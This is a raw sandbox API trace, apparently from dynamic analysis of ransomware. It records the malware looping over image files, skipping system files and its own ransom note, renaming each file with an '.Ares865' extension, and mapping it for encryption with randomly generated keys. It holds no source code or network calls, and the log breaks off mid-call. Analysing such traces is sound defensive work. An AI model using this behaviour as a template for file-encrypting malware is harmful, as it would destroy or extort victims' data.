lstrcmpiW (lpString1="25.png", lpString2="bootmgr") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="temp") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="pagefile.sys") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="boot") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="ids.txt") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="ntuser.dat") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="perflogs") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="MSBuild") returned -1 [0115.757] lstrlenW (lpString="25.png") returned 6 [0115.757] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png") returned 75 [0115.757] lstrcpyW (in: lpString1=0x2cce48a, lpString2="25.png" | out: lpString1="25.png") returned="25.png" [0115.757] lstrlenW (lpString="25.png") returned 6 [0115.757] lstrlenW (lpString="Ares865") returned 7 [0115.757] lstrlenW (lpString=".dll") returned 4 [0115.758] lstrcmpiW (lpString1="25.png", lpString2=".dll") returned 1 [0115.758] lstrlenW (lpString=".lnk") returned 4 [0115.758] lstrcmpiW (lpString1="25.png", lpString2=".lnk") returned 1 [0115.758] lstrlenW (lpString=".ini") returned 4 [0115.758] lstrcmpiW (lpString1="25.png", lpString2=".ini") returned 1 [0115.758] lstrlenW (lpString=".sys") returned 4 [0115.758] lstrcmpiW (lpString1="25.png", lpString2=".sys") returned 1 [0115.758] lstrlenW (lpString="25.png") returned 6 [0115.758] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.Ares865") returned 83 [0115.758] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png.ares865"), dwFlags=0x1) returned 1 [0115.759] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.760] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5573) returned 1 [0115.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.760] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.761] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.761] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.761] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18d0, lpName=0x0) returned 0x170 [0115.770] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18d0) returned 0x190000 [0115.771] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.771] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.771] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.772] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.772] CloseHandle (hObject=0x170) returned 1 [0115.772] CloseHandle (hObject=0x118) returned 1 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.773] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.773] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc18a068, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc18a068, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="26.png", cAlternateFileName="")) returned 1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="aoldtz.exe") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2=".") returned 1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="..") returned 1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="windows") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="bootmgr") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="temp") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="pagefile.sys") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="boot") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="ids.txt") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="ntuser.dat") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="perflogs") returned -1 [0115.773] lstrcmpiW (lpString1="26.png", lpString2="MSBuild") returned -1 [0115.773] lstrlenW (lpString="26.png") returned 6 [0115.773] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png") returned 75 [0115.773] lstrcpyW (in: lpString1=0x2cce48a, lpString2="26.png" | out: lpString1="26.png") returned="26.png" [0115.773] lstrlenW (lpString="26.png") returned 6 [0115.773] lstrlenW (lpString="Ares865") returned 7 [0115.773] lstrlenW (lpString=".dll") returned 4 [0115.773] lstrcmpiW (lpString1="26.png", lpString2=".dll") returned 1 [0115.773] lstrlenW (lpString=".lnk") returned 4 [0115.773] lstrcmpiW (lpString1="26.png", lpString2=".lnk") returned 1 [0115.773] lstrlenW (lpString=".ini") returned 4 [0115.774] lstrcmpiW (lpString1="26.png", lpString2=".ini") returned 1 [0115.774] lstrlenW (lpString=".sys") returned 4 [0115.774] lstrcmpiW (lpString1="26.png", lpString2=".sys") returned 1 [0115.774] lstrlenW (lpString="26.png") returned 6 [0115.774] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.Ares865") returned 83 [0115.774] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png.ares865"), dwFlags=0x1) returned 1 [0115.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.777] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5064) returned 1 [0115.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.777] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.778] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.778] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.779] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16d0, lpName=0x0) returned 0x170 [0115.780] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d0) returned 0x190000 [0115.781] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.782] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.782] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.782] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.782] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.782] CloseHandle (hObject=0x170) returned 1 [0115.782] CloseHandle (hObject=0x118) returned 1 [0115.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.783] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1b01c7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1b01c7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27.png", cAlternateFileName="")) returned 1 [0115.783] lstrcmpiW (lpString1="27.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.783] lstrcmpiW (lpString1="27.png", lpString2="aoldtz.exe") returned -1 [0115.783] lstrcmpiW (lpString1="27.png", lpString2=".") returned 1 [0115.783] lstrcmpiW (lpString1="27.png", lpString2="..") returned 1 [0115.783] lstrcmpiW (lpString1="27.png", lpString2="windows") returned -1 [0115.783] lstrcmpiW (lpString1="27.png", lpString2="bootmgr") returned -1 [0115.783] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.Ares865") returned 83 [0115.783] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png.ares865"), dwFlags=0x1) returned 1 [0115.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.785] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5064) returned 1 [0115.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.785] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.786] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.786] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.786] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16d0, lpName=0x0) returned 0x170 [0115.787] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d0) returned 0x190000 [0115.788] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.789] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.789] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.790] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.790] CloseHandle (hObject=0x170) returned 1 [0115.790] CloseHandle (hObject=0x118) returned 1 [0115.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.790] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1d6326, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1d6326, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="28.png", cAlternateFileName="")) returned 1 [0115.790] lstrcmpiW (lpString1="28.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.790] lstrcmpiW (lpString1="28.png", lpString2="aoldtz.exe") returned -1 [0115.790] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.Ares865") returned 83 [0115.790] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png.ares865"), dwFlags=0x1) returned 1 [0115.792] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.792] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5064) returned 1 [0115.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.793] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.793] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.793] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.794] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16d0, lpName=0x0) returned 0x170 [0115.795] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d0) returned 0x190000 [0115.797] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.797] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.797] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.798] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.798] CloseHandle (hObject=0x170) returned 1 [0115.798] CloseHandle (hObject=0x118) returned 1 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.798] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1fc485, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1fc485, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="29.png", cAlternateFileName="")) returned 1 [0115.799] lstrcmpiW (lpString1="29.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.799] lstrcmpiW (lpString1="29.png", lpString2="aoldtz.exe") returned -1 [0115.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.Ares865") returned 83 [0115.799] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png.ares865"), dwFlags=0x1) returned 1 [0115.801] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.801] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4112) returned 1 [0115.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.801] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.802] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.802] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.802] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1310, lpName=0x0) returned 0x170 [0115.804] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1310) returned 0x190000 [0115.805] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.806] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.806] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.806] HeapFree (in: 